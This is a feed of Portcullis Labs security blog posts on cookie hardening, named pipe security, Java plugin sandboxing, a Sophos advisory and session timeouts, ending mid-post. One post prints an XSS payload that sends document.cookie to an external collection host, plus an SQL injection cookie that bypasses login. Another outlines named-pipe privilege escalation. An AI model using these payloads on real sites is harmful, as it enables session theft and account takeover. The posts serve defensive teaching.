Portcullis Labs — Research and Development
https://labs.portcullis.co.uk

Keep your cookies safe (part 2)
https://labs.portcullis.co.uk/blog/keep-your-cookies-safe-part-2/
Thu, 15 Feb 2018

In the first blog post we talked about the dangers to which your cookies are exposed. Now it is time to keep your cookies safe: time to learn what protection mechanisms exist, how to use them and why.

How to read this post?

The flowchart below will guide you through the process of checking whether your cookies are well protected. Note that there are further factors and cases that could potentially compromise your cookies (as discussed in part 1 of this series).

Of course, at the end of the post you will find an explanation of the flowchart, so if anything is unclear, do not panic! Look for the question in the last part of the post, where it is explained.

[Flowchart image: how to get your cookies better secured.]

Is your session cookie different before and after login?

  • Correct answer: Yes. If your unique session ID cookie differs before and after login, your session is correctly protected against session fixation attacks
  • Incorrect answer: No. If your unique session ID cookie stays the same, an attacker who manages to steal it before you log in to the web application can also access the application once you are authenticated

Recommendation: The session ID should be changed when the user logs in.

Are you invalidating the session when the user logs out?

  • Correct answer: Yes, once the user has logged out, the session is destroyed or invalidated
  • Incorrect answer: No, if you do not destroy the session server side, the session ID remains valid

Recommendation: Session must be invalidated after the user logs out.
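The first two checks above can be sketched in a few lines. This is a minimal in-memory sketch, not framework code; the class and method names are invented for illustration:

```python
import secrets

class SessionStore:
    """Toy session store demonstrating two protections: rotating the
    session ID at login (anti session fixation) and destroying the
    session server side at logout."""

    def __init__(self):
        self._sessions = {}  # session_id -> session data

    def create(self):
        sid = secrets.token_hex(16)
        self._sessions[sid] = {"authenticated": False}
        return sid

    def login(self, old_sid, username):
        # Rotate the ID: move state to a fresh ID and drop the old one,
        # so a pre-login ID fixed by an attacker becomes worthless.
        data = self._sessions.pop(old_sid)
        data.update(authenticated=True, user=username)
        new_sid = secrets.token_hex(16)
        self._sessions[new_sid] = data
        return new_sid

    def logout(self, sid):
        # Invalidate server side, not merely expire the client's cookie.
        self._sessions.pop(sid, None)

    def is_valid(self, sid):
        return sid in self._sessions

store = SessionStore()
anonymous_sid = store.create()
auth_sid = store.login(anonymous_sid, "alice")
assert auth_sid != anonymous_sid          # new ID after login
assert not store.is_valid(anonymous_sid)  # fixed pre-login ID no longer works
store.logout(auth_sid)
assert not store.is_valid(auth_sid)       # session destroyed at logout
```

Real frameworks expose equivalents (for example, regenerating the session identifier on privilege change), but the invariant is the same: no session ID issued before authentication should remain valid after it.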

Does your cookie have the attribute “HttpOnly”?

  • Correct answer: Yes, your cookie is only accessible via HTTP(S) and not via JavaScript
  • Incorrect answer: No, your cookie is also accessible via JavaScript, so an attacker who compromises your application with Cross-site Scripting could access your cookie

Recommendation: Set the cookie as “HttpOnly”.

Does your cookie have the full domain attribute set?

  • Correct answer: Yes, your cookie is only sent to the correct domain where it is needed
  • Incorrect answer: No, your cookie can be sent to any of the sub-domains you may have

Recommendation: The full domain of the cookie must be specified.
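The HttpOnly and domain (and, further down, path) attributes can be set with Python's standard library as a quick illustration. The cookie name, value and domain below are made up for the example:

```python
from http.cookies import SimpleCookie

# Build a cookie carrying the attributes discussed above.
cookie = SimpleCookie()
cookie["session_id"] = "d8a3ae94f81234321"
cookie["session_id"]["httponly"] = True              # not readable from JavaScript
cookie["session_id"]["domain"] = "www.mydomain.com"  # full domain, not .mydomain.com
cookie["session_id"]["path"] = "/app1"               # scoped to one application

header = cookie.output(header="Set-Cookie:")
print(header)
```

Whatever language or framework you use, the resulting response header should contain the HttpOnly flag, the fully-qualified domain and, where relevant, a restrictive path.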

Does your cookie have an adequate lifetime?

  • Correct answer: Yes
  • Incorrect answer: No, cookies with an excessive lifetime will not be deleted when the user closes their browser and would therefore be exposed should an attacker manage to compromise the user’s system

Recommendation: Use cookies without an explicit lifetime so that they are deleted once the user closes their browser, or lower their lifetime to meet business requirements.

Do you have only one web application in the same domain?

What does this question mean? The following is an example of multiple web applications in the same domain:

  • www.mydomain.com/app1
  • www.mydomain.com/app2
  • www.mydomain.com/app3

There is no single correct answer to this question.

If you only have one application running on the domain, you should not need to worry about this issue. However, if you host multiple web applications, you need to set the “path” attribute of the cookie to ensure that each cookie is only sent to the web application it belongs to.

Are your cookies NOT storing sensitive information?

  • Correct answer: Yes, my cookies do not contain sensitive information
  • Incorrect answer: No, there is some sensitive information in the cookies

Recommendation: Ensure that sensitive information is not stored in the cookies.

Does your web application support HTTPS?

If the answer to this question is NO, you are sending all the data through a plain text protocol. An attacker able to intercept network traffic between a user’s session and the web server could capture the sensitive data being transmitted.

If the answer is YES, there are some other questions you need to answer before you know whether you are protecting your cookies correctly:

Does your web application use HTTP + HTTPS (mixed content)?

If the answer is NO, it means that HTTP is not allowed and all the data is being sent over HTTPS. Although your cookie is secure in this case, you need to be careful if you enable HTTP.

If the answer is YES you need to answer one more question:

Is HSTS (HTTP Strict Transport Security) enabled, or does the cookie have the “secure” attribute?

If you have HSTS enabled, you are forcing all data (cookies included) to be sent over HTTPS.

If the cookie has the attribute “secure”, you are forcing the cookie to be sent only over HTTPS.

Recommendation: Set the cookie as “secure” and consider enabling HSTS.
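Putting the transport-related advice together, a hardened HTTPS response might carry headers along the following lines (the values, cookie name and domain are illustrative only):

```
HTTP/1.1 200 OK
Strict-Transport-Security: max-age=31536000; includeSubDomains
Set-Cookie: session_id=d8a3ae94f81234321; Secure; HttpOnly; Path=/; Domain=www.mydomain.com
```

With HSTS in place, a conforming browser will refuse to talk plain HTTP to the host for max-age seconds, and the secure flag keeps the cookie off any HTTP request that does slip through.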

The post Keep your cookies safe (part 2) appeared first on Portcullis Labs.

Web Application Whitepaper
https://labs.portcullis.co.uk/whitepapers/web-application-whitepaper/
Wed, 06 Sep 2017

This document aims to analyse and explore data collected from technical assurance engagements during 2016.

The original piece of data analysis was performed by two of our interns (Daniel and Chris) as part of Cisco’s intended contribution to the next Top 10 publication from OWASP; however, due to time constraints, our data points were not submitted. As a result, the co-authors (Simone and Isa) chose to compare the EMEAR team’s statistics from 2016 against the now public 2017 Top 10 published by OWASP. Additionally, they also took a look at the most common web application issues reported by the team during the last year and analysed their impact and severity.

WAW
WAW.pdf
September 6, 2017
Version: 1.0
925.6 KiB
MD5 hash: 0986d3ab7f6f55c71199296189ce5f62
Details

The post Web Application Whitepaper appeared first on Portcullis Labs.

Keep your cookies safe (part 1)
https://labs.portcullis.co.uk/blog/keep-your-cookies-safe-part-1/
Fri, 22 Apr 2016

What are cookies and why are they important?

A cookie is a small piece of data sent from a web site, stored in a user’s web browser and subsequently included with all authenticated requests that belong to that session. Some cookies contain the user’s session data for a web site, which is vital. Other cookies are used to keep long-term records of an individual’s browsing history and preferences, such as their preferred language. Sometimes they are also used for tracking and monitoring a user’s activities across different web sites.

Because HTTP is a stateless protocol, the web site needs a way to authenticate the user on each request. Every time the user visits a new page within a web site, the browser sends the user’s cookie back to the server, allowing the server to serve the correct data to that individual user, who is tracked using a session ID. Cookies therefore play an integral part in ensuring persistence of data across multiple HTTP requests throughout the time a user visits a web site.

What does a cookie look like?

Set-Cookie: __cfduid=d8a3ae94f81234321; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.domain.com; HttpOnly

The cookie above is an example of a common cookie generated for WordPress. Here we break down each part of the cookie and explain what it is used for:

  • Set-Cookie – the web server asks the browser to save the cookie with this command
  • __cfduid=d8a3ae94f81234321; – this is the cookie itself. To the left of the equals symbol is the name of the cookie and to the right is its value
  • expires=Mon, 23-Dec-2019 23:50:00 GMT; – this is the date and time when the cookie will expire
  • path=/; domain=.domain.com; – the cookie domain and path define the scope of the cookie. They tell the browser that cookies should only be sent back to the server for the given domain and path
  • HttpOnly – this attribute (without a value associated) tells the browser that JavaScript cannot be used to access the cookie, which must only be accessed through HTTP or HTTPS. Sometimes you will also see the attribute “Secure”, which prevents the cookie being sent over the unencrypted HTTP protocol (i.e. the cookie will only be transmitted over HTTPS)
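The breakdown above can be verified programmatically. As an illustration (not part of the original post), Python's standard library can parse the example Set-Cookie value and expose each attribute:

```python
from http.cookies import SimpleCookie

# Parse the example Set-Cookie value shown above.
raw = ("__cfduid=d8a3ae94f81234321; expires=Mon, 23-Dec-2019 23:50:00 GMT; "
       "path=/; domain=.domain.com; HttpOnly")
cookie = SimpleCookie()
cookie.load(raw)

morsel = cookie["__cfduid"]
print(morsel.value)        # the cookie's value
print(morsel["path"])      # scope: path
print(morsel["domain"])    # scope: domain
print(morsel["httponly"])  # flag attribute, present without a value
```

Each attribute the browser honours (expiry, scope, flags) is thus visible to, and settable by, the server-side code that emits the header.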

What is the impact of having your cookies compromised?

A traditional and important role of a cookie is to store a user’s session ID, which is used to identify the user. If this type of cookie is stolen by a malicious user, they would be able to access the web site as the user to whom the cookie belonged (i.e. the malicious user would have access to your account within the web site).

In the case of a tracking cookie, the malicious user would have access to your browsing history for the web site.

Another problem arises when sensitive data, for example a username, is stored in cookies. This is also a vector for server-side exploitation if the cookie’s contents are not properly validated, which can potentially lead to serious vulnerabilities such as SQL injection or remote code execution.

What are the main cookie threats?

[Image: Cookie Monster.]

There are different attack vectors through which cookies can be obtained and modified, leading to the hijacking of an authenticated user’s session, or even SQL injection attacks against the server. These attacks may take place when an attacker takes control of the web browser using Cross-site Scripting or spyware in order to obtain a user’s session ID cookie, which can then be used by the attacker to impersonate the legitimate user, as shown in the following example:

Obtaining access to the cookie can be as easy as using the following JavaScript line:

document.cookie

Imagine that the web site has a search form that is vulnerable to Cross-site Scripting (Reflective Cross-site Scripting in this case).


http://myweb.com/form.php?search=XSS_PAYLOAD_HERE

An attacker could use the following payload to send the cookie to an external web site:

<script>location.href='http://external_website.com/cookiemonster.php?c00kie='+escape(document.cookie);</script>

The final step would be to send the vulnerable link to an admin and wait for them to click on it. If the attacker uses a URL shortener, the malicious URL can be further obfuscated, as the admin will be unable to see the content of the link they have been sent.
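On the receiving end, the attacker's collection endpoint simply reads the stolen value out of the query string. As a sketch of what the hypothetical cookiemonster.php above would do (Python stands in for PHP here; the URL and parameter name follow the payload in the example):

```python
from urllib.parse import urlparse, parse_qs

def extract_stolen_cookie(request_url):
    """Pull the exfiltrated cookie out of the c00kie query parameter."""
    query = urlparse(request_url).query
    params = parse_qs(query)  # percent-decodes values, e.g. %3D -> '='
    return params.get("c00kie", [None])[0]

# What arrives when the XSS payload fires in a victim's browser:
url = "http://external_website.com/cookiemonster.php?c00kie=PHPSESSID%3Dabc123"
print(extract_stolen_cookie(url))  # PHPSESSID=abc123
```

The point for defenders: once JavaScript can read document.cookie, a single redirect or image request is enough to hand the session to an attacker, which is why the HttpOnly flag matters.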

An attacker able to read a given user’s files may also attempt to retrieve the cookies stored on that system. Furthermore, some browsers store persistent cookies in a binary file that is easily readable with existing public tools.

Security weaknesses may also reside server side when cookies are modified, if input validation routines are not adequately implemented. The example below shows how the authentication process could be bypassed:

// In /core/user.php (CS-Cart vulnerability): the cookie values are
// concatenated straight into the SQL query without any validation.
if (fn_get_cookie(AREA_NAME . '_user_id')) {
    $udata = db_get_row("SELECT user_id, user_type, tax_exempt, last_login, membership_status, membership_id FROM $db_tables[users]
        WHERE user_id='" . fn_get_cookie(AREA_NAME . '_user_id') . "' AND password='" . fn_get_cookie(AREA_NAME . '_password') . "'");
    fn_define('LOGGED_VIA_COOKIE', true);
}

// A crafted cookie such as the following terminates the user_id string
// and comments out the password check, bypassing authentication:
// Cookie: cs_cookies[customer_user_id]=1'/*
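The standard remediation is to treat the cookie value strictly as data by binding it as a query parameter rather than interpolating it into the SQL string. A minimal sketch (Python with SQLite standing in for the PHP/MySQL code above; table and values are invented for the example):

```python
import sqlite3

# Toy user table to demonstrate the parameterised lookup.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (user_id TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('1', 'secret')")

def lookup_user(user_id, password):
    # The ? placeholders bind the cookie-supplied values as data, so a
    # payload like "1'/*" cannot break out of the SQL statement.
    return conn.execute(
        "SELECT user_id FROM users WHERE user_id = ? AND password = ?",
        (user_id, password),
    ).fetchone()

print(lookup_user("1'/*", "anything"))  # None - injection attempt finds nothing
print(lookup_user("1", "secret"))       # ('1',) - legitimate login
```

The same injection string that bypassed the concatenated query above is simply a user ID that matches no row here.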

Given the role they play, cookies are very important and may be targeted in a variety of attacks.

Now that you are more aware of the dangers, it would be wise to ensure steps are taken to deploy web site cookies safely and securely. Look out for the second part of this post!

The post Keep your cookies safe (part 1) appeared first on Portcullis Labs.

Windows Named Pipes: There and back again
https://labs.portcullis.co.uk/blog/windows-named-pipes-there-and-back-again/
Fri, 20 Nov 2015

Inter Process Communication (IPC) is a ubiquitous part of modern computing. Processes often talk to each other and many software packages contain multiple components which need to exchange data to run properly. Named pipes are one of the many forms of IPC in use today and are extensively used on the Windows platform as a means to exchange data between running processes in a semi-persistent manner.

On Windows, named pipes operate in a server-client model and can make use of the Windows Universal Naming Convention (UNC) for both local and remote connections.

Named pipes on Windows use what is known as the Named Pipe File System (NPFS). The NPFS is a hidden partition which functions just like any other; files are written, read and deleted using the same mechanisms as a standard Windows file system. So named pipes are actually just files on a hard drive which persist until there are no remaining handles to the file, at which point the file is deleted by Windows.

The named pipe directory is located at: \\<machine_address>\pipe\<pipe_name>

There are many easy ways to read the contents of the local NPFS: PowerShell, Microsoft Sysinternals Process Explorer and Pipelist, as well as numerous third party tools.

It’s also very easy to implement in a language such as C#, with a basic listing of the named pipe directory being as simple as:

System.IO.Directory.GetFiles(@"\\.\pipe\");

Exploitation of named pipes

Named pipes were introduced with NT and have been known to be vulnerable to a number of attacks over the years, especially once full support was adopted with Windows 2000. For example, the Service Control Manager (SCM) of Windows was discovered to be vulnerable to race conditions related to named pipes in 2000; more recently, a predictable named pipe used by Google Chrome could be exploited to help escape from the browser sandbox.

To date, the most common way to exploit named pipes to gain privileges on a system has been to abuse the impersonation token granted to the named pipe server to act on behalf of a connected client.

If the named pipe server is already running this is not particularly useful as we cannot create the primary server instance which clients will connect to, so it is generally required to preemptively create a named pipe server using the same name as the vulnerable service would normally create. This means that the user needs to know the name of the pipe before the vulnerable service is started and then wait for a client to connect. Ideal targets are services which run at administrator or SYSTEM level privileges, for the obvious reasons.

The problem with impersonation tokens begins when a client is running at a higher permission level than the server it is connecting to. If impersonation is allowed, the server can use the impersonation token to act on the client’s behalf.

The level of impersonation a server can perform depends on the level of consent a client provides. The client specifies a security quality of service (SQOS) when connecting to the server. The level of impersonation provided to the server by the SQOS can be one of the following four flags, which in the case of named pipes are provided as part of the connection process when calling the CreateFile function:

  • SECURITY_ANONYMOUS – no impersonation allowed at all. The server cannot even identify the client
  • SECURITY_IDENTIFICATION – impersonation is not allowed, but the server can identify the client
  • SECURITY_IMPERSONATION – the client can be both identified and impersonated, but only locally (default)
  • SECURITY_DELEGATION – the client can be identified and impersonated, both locally and remotely

When granted, impersonation tokens can be converted to primary security tokens with ease by calling the DuplicateTokenEx() function. From here it is just a matter of calling the CreateProcessAsUser() function to spawn a process (let’s say cmd.exe) using the new primary token which has the security context of the client.
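The sequence described above can be sketched as follows (pseudocode modelled on the Win32 API: the function names are real, but error handling and most parameters are elided, and the pipe name is made up):

```
// Malicious server pre-creates the pipe a privileged client will use
hPipe  = CreateNamedPipe("\\\\.\\pipe\\vulnerable_service", ...)
ConnectNamedPipe(hPipe)                   // wait for the privileged client
ImpersonateNamedPipeClient(hPipe)         // adopt the client's security context
OpenThreadToken(GetCurrentThread(), ..., &hToken)
DuplicateTokenEx(hToken, ..., &hPrimary)  // impersonation token -> primary token
CreateProcessAsUser(hPrimary, "cmd.exe", ...) // shell in the client's context (e.g. SYSTEM)
```

Note that the level of access obtained depends entirely on the SQOS flags the client supplied when it connected, which is the lever defenders control.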

Numerous Metasploit modules are available for exploiting named pipe vulnerabilities which have cropped up over the years. For example, the getsystem module in Metasploit makes use of named pipes to escalate to SYSTEM level privileges from Administrator.

Metasploit includes two different techniques which use named pipes to ‘get system’. The first one works by starting a named pipe server and then using administrator privileges to schedule a service to run as SYSTEM. This service connects as a named pipe client to the recently created server. The server impersonates the client and uses this to spawn a SYSTEM process for the meterpreter client.

The second technique is similar to the first, but instead a DLL is dropped to the hard drive and scheduled to run as SYSTEM; this technique is evidently not as clean as the first.

Thanks to Cristian Mikehazi for his prior research in to Metasploit’s getsystem module which made this section easier to write.

Security considerations for Named Pipes / How to make safe pipes

The security of named pipes is largely down to the developer and how they choose to implement the server and client sides of the application.

This is by no means an exhaustive list, but below details some of the good practices which should be considered whenever named pipes are to be deployed.

Server side security

The named pipe server is responsible for creating and managing a named pipe and its connected clients. Therefore, the most important element is to ensure that the named pipe server is indeed the correct server.

To this end, there is an important flag which should be set when attempting to start a new named pipe server: FILE_FLAG_FIRST_PIPE_INSTANCE.

Setting this flag ensures that if the instance the server is attempting to create is not the first instance of the named pipe, the instance is not created. In other words, it can give an indication as to whether another process has already created a named pipe server with this name and can allow for corrective action. This could be in the form of creating the server with an alternate name or stopping execution entirely. It is also a good idea that any intended clients are made aware, if possible, that the server instance is not valid or has been changed, so that they do not attempt to connect.

Further to this, creating a named pipe server with a pseudo-randomly generated name can help ensure that any attempt by an attacker to preemptively create the server process will be unsuccessful. This is an approach the Google Chrome browser uses to help thwart unintended processes from creating the named pipe servers it uses for communication.

Another important server element is the maximum number of client instances allowed at any one time. If the maximum number of potential clients which will connect is known, a hard figure should be set to ensure that no further clients can connect. The flag which defines the maximum number of concurrent pipe instances is set as an integer value between 1 and 255 at invocation. To allow unlimited connections, the flag is set to PIPE_UNLIMITED_INSTANCES.

Client side security

Whenever a client pipe is under development, it is extremely important to consider carefully the level of privileges the pipe needs to do its job and to run it at the minimum level required.

The primary source of exploits against named pipes is the impersonation of client privileges by the named pipe server. The easiest and most direct way to prevent a named pipe client from being impersonated is to disallow pipe impersonation when connecting to a server. This can be achieved by setting the SECURITY_IDENTIFICATION flag or the SECURITY_ANONYMOUS flag when calling the CreateFile() function as part of the client connection process.
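For instance, a client wishing to deny impersonation might connect like this (pseudocode modelled on the Win32 CreateFile() call; the pipe name is made up). Note that SECURITY_SQOS_PRESENT must accompany any SQOS flag:

```
hPipe = CreateFile(
    "\\\\.\\pipe\\my_service",        // pipe to connect to
    GENERIC_READ | GENERIC_WRITE,
    0, NULL, OPEN_EXISTING,
    SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION,  // server may identify, never impersonate
    NULL)
```

Without SECURITY_SQOS_PRESENT the default of SECURITY_IMPERSONATION applies, which is exactly what the attacks described above rely on.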

In cases where impersonation is necessary, there are a number of other ways to ensure that only a legitimate client connects to a server. For example, in a simple application a specific sequence of information could be exchanged between the server and the client (a handshake) before any actual data is exchanged. For more advanced protection, encryption could be used. While not natively supported, public key cryptography could be used if implemented correctly. These mechanisms are beyond the scope of this post but are worth bearing in mind.

The post Windows Named Pipes: There and back again appeared first on Portcullis Labs.

Building a sandpit
https://labs.portcullis.co.uk/blog/building-a-sandpit/
Tue, 18 Nov 2014

Today I was looking at how plugins could safely be incorporated into a J2EE application server. The plugins in this instance are executed server side, rather than on the client and are, in the main, provided by 3rd parties (digital advertising agencies etc). The aim was to limit the scope in which they operate. The implementation I looked at is pretty much the first instance where I’ve seen these techniques used, so I thought it was worth sharing.

Let’s begin by enumerating the techniques that can be used:

  • Enforcement of code signing
  • Execution by a custom class loader
  • Use of a custom security manager
  • Execution under a custom policy

Code signing is most commonly used by the JRE to secure applets that are deployed as part of a web application. In that context, Oracle use code signing to warn users about untrusted code and to limit the APIs that untrusted code can make use of. Of course, historically, this technique has been bypassed by luring users into accepting the untrusted code (these days Java will prompt even if code is signed, and browsers often offer their own prompt too) and by identifying flaws in the JRE which allow the untrusted code to call APIs that would otherwise be restricted. Whilst the latter is still a potential cause for concern, running untrusted code in a J2EE application server won’t result in a popup that can be ignored, making this technique far more effective.

However, in the case of an application running in a J2EE application server, this distinction between trusted and untrusted code is not typically present and all code is considered trusted. To enable the use of signed code, the developers therefore opted to make use of a custom class loader. The custom class loader they implemented extended the SecureClassLoader class, not just to enforce code signing as outlined above but also to limit where classes could be loaded from. Taking this approach, malicious code would not only need to be correctly signed but would also need to have been deployed to a specific directory path. Furthermore, attempts by plugin developers to load arbitrary bytecode, either from the JRE or from other untrusted sources, could be reviewed and granted on a case by case basis. By doing so, the developers hoped to minimise the APIs that the plugins can make use of, as well as limit the potential for an installed plugin to fetch and execute malicious code after it had been initially reviewed and found to be suitable for deployment.

An additional side effect of implementing a custom class loader as described is that it can be used in combination with a custom security manager to limit the APIs that the 3rd parties can call. The security manager is designed to determine whether any sensitive operation should be allowed. For example, it can limit access to files and network resources to prevent any unauthorised operations from occurring by mediating on behalf of the underlying JRE when such operations are attempted. The developers ensured that setSecurityManager() was called early with a custom security manager which overrode the default and implemented checkRead() etc in a restricted form. All in all, the custom security manager they wrote needed to implement checks for manipulation of the JVM (such as whether new custom class loaders are allowed), security managers (such as whether the custom class loader is allowed to instantiate a given class), system resources, threads, files and network resources.

Since bugs in the security manager (and the access controllers present in later releases of the JRE) can be exploited to gain access to privileged calls by untrusted code, the implementation called for an access controller where only a small subset of operations were permitted. By doing so, the developers were able to prevent one installed plugin from accessing resources that were only intended to be accessed by other installed plugins. In particular, to complete the code signing protection, checkAccess() was implemented to allow only a small set of trusted code signers.

Whilst the developers we worked with chose to implement their own security manager, I feel there is benefit in discussing an alternative approach. Underneath the surface of the default access controller present within the JVM is a series of permissions which can be assigned or modified through a custom security policy. Indeed, it would be possible to make use of these permissions within the developers’ custom security manager as an alternative to implementing the checks in code. To my mind, utilising a security policy is preferable since much of the complexity is abstracted away; however, it offers less fine-grained access control, since you’re limited to the policy language as implemented within the JRE.
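As an illustration of that trade-off, a policy-based approach might look something like the fragment below. This is a hypothetical java.policy entry: the signer alias, code base path and permission targets are invented for the example, not taken from the implementation discussed:

```
grant signedBy "trustedPluginVendor",
      codeBase "file:/opt/app/plugins/-" {
    permission java.io.FilePermission "/opt/app/plugins/data/-", "read";
    permission java.net.SocketPermission "ads.example.com:443", "connect";
};
```

Everything not granted here is denied by the default access controller, which gives much of the sandboxing described above without writing a security manager by hand.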

Remember that whilst privilege escalation vulnerabilities are relatively common in the JRE as a whole (hence the raft of remote code execution bugs we’ve seen with applets), what we’ve looked at here is a defence in depth measure that can be applied to so-called trusted code supplied by a 3rd party developer that runs in a server environment. Thankfully, the number of threat actors in a position to exploit any bugs you may leave behind is significantly reduced.

In conclusion, the concepts I’ve touched on in this blog post are quite complex and leave a fair degree of discretion to developers, which may allow for vulnerabilities to be introduced. If you’re interested in implementing such a solution, I would strongly recommend that you acquire a copy of Java Security, which covers these and other concepts in far greater depth. Useful too is the security research of Security Explorations, a Polish research company who have had a lot of fun with Java.

The post Building a sandpit appeared first on Portcullis Labs.

EMF Camp 2014 talk
https://labs.portcullis.co.uk/blog/emf-camp-2014-talk/
Thu, 28 Aug 2014

We recently announced our sponsorship of EMF Camp 2014; we’re ready to go, Portcullis flags in tow, and will be heading on over to Milton Keynes to help get EMF ready.

While there, we will not only be sponsoring the Lounge, where people can come and enjoy a space to relax and drink beer, and setting up the Portcullis Village, where people can visit us and exchange ideas, but members of Portcullis will also be hosting talks throughout the weekend.

How Many Bugs Can A Time Server Have? Friday 29th @ 14:00, Stage B

Portcullis members Tim Brown and Mike Emery will be talking about a number of new advisories to be released by Portcullis during the event, including a remote root in a network device. The attack surface will be broken down, with the bugs in each area exposed. The impact of the findings as a whole will then be discussed, with the consequences potentially reaching far beyond the compromised device itself!

Minimal Effort Web Application Security (a.k.a. how to make my job harder) Sunday 31st @ 12:00 Stage C

Portcullis member Graham Sutherland will be presenting his quick tips on making your web applications more resistant to common attack vectors, without putting a lot of effort in. Graham says “In some cases, simply adding a line to a configuration file can completely prevent entire classes of attack from being viable”. Graham will take a look at hardening against XSS, SQL injection, clickjacking, password cracking, and a few other bits if there’s time. “With any luck, you’ll make my job a lot harder!”

For those spoilt for choice, both talks will be featured in our EMF blog, to be posted after the event.

The post EMF Camp 2014 talk appeared first on Portcullis Labs.

Windows System Objects and Sophos Endpoint Security
https://labs.portcullis.co.uk/blog/windows-system-objects-and-sophos-endpoint-security/
Mon, 03 Feb 2014

The post Windows System Objects and Sophos Endpoint Security appeared first on Portcullis Labs.

]]>
Windows system objects are one of the interesting areas of binary application assessments that are often ignored or misunderstood. Many people don’t realise that abstract Windows application programming concepts such as mutexes, events, semaphores, shared memory sections, and jobs all come together under the purview of the Windows Object Manager. These objects, like those in the filesystem and registry namespaces, have all sorts of interesting security impacts when not properly managed.

This blog post relates to an advisory. See CVE-2014-1213: Denial of Service in Sophos Anti-Virus for the release.

One of the major differences of the system object namespace, versus the filesystem and registry namespaces, is the concept of a default Discretionary Access Control List (DACL). These DACLs are the cornerstone of the Windows security model, and are used to describe which entities (users, groups, etc.) have specific types of access to an object. When you view the permissions on a file or directory, you’re looking at a direct representation of the DACL for that object. Each rule within a DACL is called an Access Control Entry (ACE). When an object in any namespace is created and the application does not explicitly provide a DACL, the system looks at the parent container to see if it has any ACEs within its DACL that are marked as inheritable. If it finds some, it applies them across into a new DACL for the newly created object. There are special rules around inheritance for containers, but we won’t get into that here. If there are no inheritable ACEs, it resorts to applying the default DACL for the namespace. This is where things get interesting from a security perspective; the system object namespace, in contrast with the registry and filesystem namespaces, has no default DACL. In this situation, the system applies a null DACL, which allows everyone full access to the object.

This is a corner-case that many developers fall foul of. Objects created in the local container (i.e. the system object container for the current session) inherit some ACEs from the session container, but the global container has no inheritable ACEs, and therefore objects within it that are created without an explicit DACL will end up with a null DACL. We can see this in action by viewing the DACLs applied to the global and session containers, using a tool such as WinObj:

DACL applied to session container in the Windows system object namespace.
image-3360

DACL applied to session container in the Windows system object namespace.

DACL applied to global container in the Windows system object namespace.
image-3361

DACL applied to global container in the Windows system object namespace.

Notice that all the ACEs in the global container are marked as “Inherit None”, meaning that child objects will not inherit them as part of their DACL. As such, if you create a system object such as a mutex or an event through the usual CreateMutex or CreateEvent API calls, and fail to explicitly provide a DACL, all users on the system will have unrestricted access to that object.

Whilst digging into security issues around this common mistake, I found a number of vulnerabilities in a range of products. In general the impacts of being able to mess with these were low, usually causing the affected application to lock up or stop working in some way. In Sophos Endpoint Security, however, the impact was more interesting. Most anti-malware software consists of three major sections: a user-facing GUI for controlling and monitoring the product, a high privilege user-mode service for performing various scanning features, and one or more kernel-mode modules (commonly referred to as drivers) that provide filesystem filters, notification of new threads and processes, low-level memory access, hook detection, and other kernel-level functionality. Communicating quickly and reliably between these components is a daunting task, especially when your messages have to traverse across the user-mode / kernel-mode barrier. Enter global system objects. Mutexes, events, semaphores, and shared memory sections in the global container of the system object namespace are all directly accessible from both user-mode and kernel-mode. When combined properly, these object types allow a developer to create an inter-process communications framework that is fast, reliable, and thread-safe.

One example of this might be a feature where a filesystem filter driver needs to notify the user-mode service that new data has been written to disk, so that it can scan it. Three named objects – an event, a mutex, and a shared memory section – are created within the global namespace, so that both components can access them. The event is used to signal that a write operation is pending, the mutex is used to ensure that the shared memory section is accessed by only one thread at a time, and the shared memory section is used to hold information about the event. The whole process is rather complex, and is best described in a diagram:

Example IPC mechanism

Diagram of an example IPC mechanism between a user-mode AV service and a kernel-mode file system driver.

As you can see, the user-mode service is responsible for checking the write operations before they are allowed. The decision is passed back to the driver, which either completes the write or rejects it, issuing an appropriate error code.

Now, imagine you let a low-privilege user interact with these objects. For one, they may be able to wait on the event object themselves and modify the shared memory section via a race condition. This can be somewhat mitigated by various integrity checks, but isn’t outside the realms of possibility. Another issue is that all of these components modify their state, and in some cases block execution, when the event and mutex objects are waited upon or signalled. Imagine that a malicious local user acquires the mutex, then signals the event. The user-mode service continues execution (step 7) and attempts to acquire the mutex (step 8), but since the malicious user has already acquired it, the service thread is now blocked. From this point on, the driver’s calls to have write operations checked go unheeded. Although the architecture is not identical, this is precisely the mechanism in which Sophos Endpoint Security failed.

As the advisory describes, CVE-2014-1213 relates to a lack of DACLs applied to system objects. As we discussed above, failure to explicitly supply a DACL when creating system objects results in the object being created with the default DACL for the namespace, which is null. The impact is that a local low-privilege user can manipulate these objects as they wish. Since this can lead to disk IO requests being ignored, or at least heavily delayed, the system eventually cannot continue. In many cases it simply locks up and becomes unresponsive, as user-mode programs and subsystems (e.g. SMSS / CSRSS) cannot complete blocking disk operations. In some cases, the system will recognise the pattern of failures and forcefully terminate the system with a bugcheck (BSoD) in order to reduce the potential for permanent damage to the system state. Of course, this isn’t particularly interesting from a security perspective if you only consider a desktop environment, but imagine the impact on a terminal services system with hundreds or thousands of users.

Sophos have now patched this issue in engine 3.50, which went live on the 21st of January. Portcullis have independently verified this fix as being effective after the update is applied and the system is rebooted.

The post Windows System Objects and Sophos Endpoint Security appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/windows-system-objects-and-sophos-endpoint-security/feed/ 0
Improving the security in web sessions (part 2) https://labs.portcullis.co.uk/blog/improving-the-security-in-web-sessions-part-2/ https://labs.portcullis.co.uk/blog/improving-the-security-in-web-sessions-part-2/#comments Fri, 24 Jan 2014 00:02:38 +0000 https://labs.portcullis.co.uk/?p=2591 The previous post about session management was about how to improve the security of web sessions. An aspect which was not addressed in that post is how to identify that a session is not in active use any more but where the user has manually logged out. For example, a user who was using a […]

The post Improving the security in web sessions (part 2) appeared first on Portcullis Labs.

]]>
The previous post about session management was about how to improve the security of web sessions. An aspect which was not addressed in that post is how to identify that a session is no longer in active use where the user has not manually logged out. For example, a user who was using a banking application and closed the tab without logging out of the application.

This point is also crucial for web applications because computers and web browsers are frequently shared between people, so it is important that this case cannot be exploited. Identifying when the user stops working with a web application and terminating the session reduces the window of opportunity that surrounds this type of attack.

Although web applications should always include a “Log out” button, it is naive to think that all users are going to close their sessions when they finish using a web application or before closing the tab/web browser where it was loaded.

Using JavaScript events

